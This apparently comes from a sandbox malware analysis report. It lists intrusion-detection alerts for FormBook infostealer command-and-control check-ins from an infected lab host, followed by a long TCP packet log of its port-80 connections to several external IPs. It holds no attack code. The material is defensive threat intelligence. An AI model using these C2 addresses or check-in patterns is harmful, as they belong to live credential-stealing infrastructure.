05/23/24-15:22:11.829591 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49759 | 80 | 192.168.2.6 | 212.227.172.253
05/23/24-15:19:59.949567 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49723 | 80 | 192.168.2.6 | 203.161.43.228
05/23/24-15:21:23.355712 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49746 | 80 | 192.168.2.6 | 188.114.96.3
05/23/24-15:21:37.915666 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49750 | 80 | 192.168.2.6 | 194.58.112.174
05/23/24-15:22:51.493681 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49769 | 80 | 192.168.2.6 | 162.240.81.18
05/23/24-15:21:52.561396 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49754 | 80 | 192.168.2.6 | 5.101.153.149
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 15:18:49.673758984 CEST | 49705 | 80 | 192.168.2.6 | 69.57.162.24
May 23, 2024 15:18:49.678783894 CEST | 80 | 49705 | 69.57.162.24 | 192.168.2.6
May 23, 2024 15:18:49.678978920 CEST | 49705 | 80 | 192.168.2.6 | 69.57.162.24
May 23, 2024 15:18:49.680830002 CEST | 49705 | 80 | 192.168.2.6 | 69.57.162.24
May 23, 2024 15:18:49.710051060 CEST | 80 | 49705 | 69.57.162.24 | 192.168.2.6
May 23, 2024 15:18:50.298168898 CEST | 80 | 49705 | 69.57.162.24 | 192.168.2.6
May 23, 2024 15:18:50.303018093 CEST | 80 | 49705 | 69.57.162.24 | 192.168.2.6
May 23, 2024 15:18:50.303030014 CEST | 80 | 49705 | 69.57.162.24 | 192.168.2.6
May 23, 2024 15:18:50.303188086 CEST | 49705 | 80 | 192.168.2.6 | 69.57.162.24
May 23, 2024 15:18:50.307424068 CEST | 49705 | 80 | 192.168.2.6 | 69.57.162.24
May 23, 2024 15:18:50.313431978 CEST | 80 | 49705 | 69.57.162.24 | 192.168.2.6
May 23, 2024 15:19:05.826333046 CEST | 49706 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:05.831440926 CEST | 80 | 49706 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:05.831510067 CEST | 49706 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:05.833611965 CEST | 49706 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:05.885390997 CEST | 80 | 49706 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:06.404011011 CEST | 80 | 49706 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:06.405716896 CEST | 80 | 49706 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:06.405915976 CEST | 49706 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:06.410917997 CEST | 80 | 49706 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:06.410933971 CEST | 80 | 49706 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:06.410947084 CEST | 80 | 49706 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:06.410990000 CEST | 49706 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:06.410990000 CEST | 49706 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:06.467498064 CEST | 80 | 49706 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:06.467674971 CEST | 49706 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:07.341993093 CEST | 49706 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:08.363234997 CEST | 49707 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:08.368874073 CEST | 80 | 49707 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:08.368967056 CEST | 49707 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:08.371110916 CEST | 49707 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:08.424000978 CEST | 80 | 49707 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:08.944555044 CEST | 80 | 49707 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:08.945955038 CEST | 80 | 49707 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:08.946085930 CEST | 49707 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:08.949326038 CEST | 80 | 49707 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:08.949333906 CEST | 80 | 49707 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:08.949347973 CEST | 80 | 49707 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:08.949420929 CEST | 49707 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:08.995491982 CEST | 80 | 49707 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:08.997145891 CEST | 49707 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:09.872883081 CEST | 49707 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:10.892182112 CEST | 49708 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:10.897629976 CEST | 80 | 49708 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:10.898530006 CEST | 49708 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:10.900278091 CEST | 49708 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:10.907443047 CEST | 80 | 49708 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:10.959381104 CEST | 80 | 49708 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:11.487282991 CEST | 80 | 49708 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:11.488650084 CEST | 80 | 49708 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:11.488723993 CEST | 49708 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:11.492068052 CEST | 80 | 49708 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:11.492082119 CEST | 80 | 49708 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:11.492089987 CEST | 80 | 49708 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:11.492197037 CEST | 49708 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:11.492197037 CEST | 49708 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:11.543442011 CEST | 80 | 49708 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:11.545466900 CEST | 49708 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:12.721344948 CEST | 49708 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:13.736871958 CEST | 49709 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:13.742003918 CEST | 80 | 49709 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:13.742691040 CEST | 49709 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:13.744543076 CEST | 49709 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:13.794564009 CEST | 80 | 49709 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:14.310803890 CEST | 80 | 49709 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:14.311640024 CEST | 80 | 49709 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:14.311840057 CEST | 49709 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:14.318681002 CEST | 80 | 49709 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:14.318696976 CEST | 80 | 49709 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:14.318707943 CEST | 80 | 49709 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:14.318840981 CEST | 49709 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:14.318866968 CEST | 49709 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:14.320998907 CEST | 49709 | 80 | 192.168.2.6 | 162.240.81.18
May 23, 2024 15:19:14.341939926 CEST | 80 | 49709 | 162.240.81.18 | 192.168.2.6
May 23, 2024 15:19:19.619318008 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:19.629822969 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:19.630108118 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:19.632072926 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:19.704380035 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.166640043 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.167527914 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.167630911 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:20.172131062 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.176995039 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.177005053 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.177086115 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:20.187411070 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.187546968 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:20.190502882 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.190517902 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.190593958 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:20.198250055 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.198261023 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.198292971 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.198383093 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:20.203084946 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.203155994 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:20.205920935 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.247869015 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:20.261265993 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.262737036 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.262918949 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:20.266865015 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.271312952 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.271323919 CEST | 80 | 49711 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:20.271399021 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:21.138447046 CEST | 49711 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:22.157290936 CEST | 49712 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:22.163894892 CEST | 80 | 49712 | 216.40.34.41 | 192.168.2.6
May 23, 2024 15:19:22.164015055 CEST | 49712 | 80 | 192.168.2.6 | 216.40.34.41
May 23, 2024 15:19:22.165946007 CEST | 49712 | 80 | 192.168.2.6 | 216.40.34.41
                                  May 23, 2024 15:19:22.216761112 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.705976963 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.706659079 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.708333969 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.708587885 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:22.710387945 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.710396051 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.710468054 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:22.711849928 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.711857080 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.711919069 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:22.715688944 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.715703011 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.715754986 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:22.717035055 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.717041969 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.717096090 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:22.720468044 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.720587969 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:22.724261045 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.734038115 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.734098911 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:22.794985056 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.795754910 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.795905113 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:22.797498941 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.800487041 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.800496101 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.800506115 CEST8049712216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:22.800599098 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:23.669922113 CEST4971280192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:24.688445091 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:24.694024086 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:24.694155931 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:24.696022987 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:24.701327085 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:24.708538055 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.218638897 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.220802069 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.220997095 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:25.225644112 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.225657940 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.225703001 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:25.235279083 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.240149021 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.240164042 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.240222931 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:25.249802113 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.249818087 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.249886036 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:25.255414963 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.255428076 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.255438089 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.255448103 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.255506992 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:25.255542994 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:25.260176897 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.260241032 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:25.309227943 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.310539007 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.310652971 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:25.313572884 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.316617966 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.316626072 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.316627026 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.316715956 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:25.360131025 CEST8049713216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:25.360281944 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:26.200984001 CEST4971380192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:27.219573975 CEST4971480192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:27.224818945 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.224967957 CEST4971480192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:27.226608992 CEST4971480192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:27.276702881 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.726614952 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.728070974 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.728204012 CEST4971480192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:27.731059074 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.734087944 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.734149933 CEST4971480192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:27.737076044 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.737088919 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.737101078 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.737243891 CEST4971480192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:27.745450974 CEST4971480192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:27.780618906 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:27.780798912 CEST4971480192.168.2.6216.40.34.41
                                  May 23, 2024 15:19:27.785675049 CEST8049714216.40.34.41192.168.2.6
                                  May 23, 2024 15:19:32.765815973 CEST4971580192.168.2.63.33.130.190
                                  May 23, 2024 15:19:32.770781040 CEST80497153.33.130.190192.168.2.6
                                  May 23, 2024 15:19:32.770862103 CEST4971580192.168.2.63.33.130.190
                                  May 23, 2024 15:19:32.772777081 CEST4971580192.168.2.63.33.130.190
                                  May 23, 2024 15:19:32.824564934 CEST80497153.33.130.190192.168.2.6
                                  May 23, 2024 15:19:33.241208076 CEST80497153.33.130.190192.168.2.6
                                  May 23, 2024 15:19:33.241350889 CEST4971580192.168.2.63.33.130.190
                                  May 23, 2024 15:19:34.279128075 CEST4971580192.168.2.63.33.130.190
                                  May 23, 2024 15:19:34.294286013 CEST80497153.33.130.190192.168.2.6
                                  May 23, 2024 15:19:35.299750090 CEST4971680192.168.2.63.33.130.190
                                  May 23, 2024 15:19:35.304857969 CEST80497163.33.130.190192.168.2.6
                                  May 23, 2024 15:19:35.306236982 CEST4971680192.168.2.63.33.130.190
                                  May 23, 2024 15:19:35.307781935 CEST4971680192.168.2.63.33.130.190
                                  May 23, 2024 15:19:35.356703043 CEST80497163.33.130.190192.168.2.6
                                  May 23, 2024 15:19:35.773699045 CEST80497163.33.130.190192.168.2.6
                                  May 23, 2024 15:19:35.773910999 CEST4971680192.168.2.63.33.130.190
                                  May 23, 2024 15:19:36.810300112 CEST4971680192.168.2.63.33.130.190
                                  May 23, 2024 15:19:36.815346956 CEST80497163.33.130.190192.168.2.6
                                  May 23, 2024 15:19:37.832741976 CEST4971780192.168.2.63.33.130.190
                                  May 23, 2024 15:19:37.838885069 CEST80497173.33.130.190192.168.2.6
                                  May 23, 2024 15:19:37.838964939 CEST4971780192.168.2.63.33.130.190
                                  May 23, 2024 15:19:37.840804100 CEST4971780192.168.2.63.33.130.190
                                  May 23, 2024 15:19:37.845747948 CEST80497173.33.130.190192.168.2.6
                                  May 23, 2024 15:19:37.891700029 CEST80497173.33.130.190192.168.2.6
                                  May 23, 2024 15:19:38.305979013 CEST80497173.33.130.190192.168.2.6
                                  May 23, 2024 15:19:38.306124926 CEST4971780192.168.2.63.33.130.190
                                  May 23, 2024 15:19:39.357337952 CEST4971780192.168.2.63.33.130.190
                                  May 23, 2024 15:19:39.362720966 CEST80497173.33.130.190192.168.2.6
                                  May 23, 2024 15:19:40.375861883 CEST4971880192.168.2.63.33.130.190
                                  May 23, 2024 15:19:40.380861998 CEST80497183.33.130.190192.168.2.6
                                  May 23, 2024 15:19:40.381025076 CEST4971880192.168.2.63.33.130.190
                                  May 23, 2024 15:19:40.382894039 CEST4971880192.168.2.63.33.130.190
                                  May 23, 2024 15:19:40.436791897 CEST80497183.33.130.190192.168.2.6
                                  May 23, 2024 15:19:41.188873053 CEST80497183.33.130.190192.168.2.6
                                  May 23, 2024 15:19:41.193588972 CEST80497183.33.130.190192.168.2.6
                                  May 23, 2024 15:19:41.193594933 CEST80497183.33.130.190192.168.2.6
                                  May 23, 2024 15:19:41.193607092 CEST80497183.33.130.190192.168.2.6
                                  May 23, 2024 15:19:41.193734884 CEST4971880192.168.2.63.33.130.190
                                  May 23, 2024 15:19:41.193805933 CEST4971880192.168.2.63.33.130.190
                                  May 23, 2024 15:19:41.198457956 CEST4971880192.168.2.63.33.130.190
                                  May 23, 2024 15:19:41.255439043 CEST80497183.33.130.190192.168.2.6
                                  May 23, 2024 15:19:46.306224108 CEST4971980192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:46.311218023 CEST8049719104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:46.311295986 CEST4971980192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:46.313193083 CEST4971980192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:46.370834112 CEST8049719104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:46.782608032 CEST8049719104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:46.789439917 CEST8049719104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:46.789571047 CEST4971980192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:47.986639023 CEST4971980192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:49.003127098 CEST4972080192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:49.009262085 CEST8049720104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:49.010524035 CEST4972080192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:49.011176109 CEST4972080192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:49.069593906 CEST8049720104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:49.705290079 CEST8049720104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:49.709988117 CEST8049720104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:49.710089922 CEST4972080192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:50.515223026 CEST4972080192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:51.531725883 CEST4972180192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:51.536922932 CEST8049721104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:51.537066936 CEST4972180192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:51.538719893 CEST4972180192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:51.543723106 CEST8049721104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:51.595093966 CEST8049721104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:51.997980118 CEST8049721104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:52.002649069 CEST8049721104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:52.002758980 CEST4972180192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:53.044759989 CEST4972180192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:54.063390017 CEST4972280192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:54.069777966 CEST8049722104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:54.071593046 CEST4972280192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:54.075609922 CEST4972280192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:54.124943018 CEST8049722104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:54.636269093 CEST8049722104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:54.640965939 CEST8049722104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:54.641834974 CEST4972280192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:54.641834974 CEST4972280192.168.2.6104.21.28.203
                                  May 23, 2024 15:19:54.651726007 CEST8049722104.21.28.203192.168.2.6
                                  May 23, 2024 15:19:59.942559004 CEST4972380192.168.2.6203.161.43.228
                                  May 23, 2024 15:19:59.947624922 CEST8049723203.161.43.228192.168.2.6
                                  May 23, 2024 15:19:59.947736025 CEST4972380192.168.2.6203.161.43.228
                                  May 23, 2024 15:19:59.949567080 CEST4972380192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:00.000765085 CEST8049723203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:00.569691896 CEST8049723203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:00.574354887 CEST8049723203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:00.574534893 CEST4972380192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:01.453474045 CEST4972380192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:02.469599009 CEST4972480192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:02.474654913 CEST8049724203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:02.475491047 CEST4972480192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:02.477355003 CEST4972480192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:02.528878927 CEST8049724203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:03.079688072 CEST8049724203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:03.084647894 CEST8049724203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:03.084727049 CEST4972480192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:04.211354017 CEST4972480192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:05.941049099 CEST4972580192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:05.946099997 CEST8049725203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:05.946176052 CEST4972580192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:05.948220015 CEST4972580192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:05.953167915 CEST8049725203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:06.000112057 CEST8049725203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:06.566871881 CEST8049725203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:06.577858925 CEST8049725203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:06.578105927 CEST4972580192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:06.584228039 CEST8049725203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:06.584301949 CEST4972580192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:07.451061964 CEST4972580192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:08.471457958 CEST4972680192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:08.946599960 CEST8049726203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:08.946708918 CEST4972680192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:08.950460911 CEST4972680192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:08.958446980 CEST8049726203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:09.560302973 CEST8049726203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:09.575510979 CEST8049726203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:09.575648069 CEST4972680192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:09.576710939 CEST4972680192.168.2.6203.161.43.228
                                  May 23, 2024 15:20:09.585557938 CEST8049726203.161.43.228192.168.2.6
                                  May 23, 2024 15:20:14.635852098 CEST4972780192.168.2.63.33.130.190
                                  May 23, 2024 15:20:14.694123983 CEST80497273.33.130.190192.168.2.6
                                  May 23, 2024 15:20:14.694399118 CEST4972780192.168.2.63.33.130.190
                                  May 23, 2024 15:20:14.696083069 CEST4972780192.168.2.63.33.130.190
                                  May 23, 2024 15:20:14.803553104 CEST80497273.33.130.190192.168.2.6
                                  May 23, 2024 15:20:15.239048004 CEST80497273.33.130.190192.168.2.6
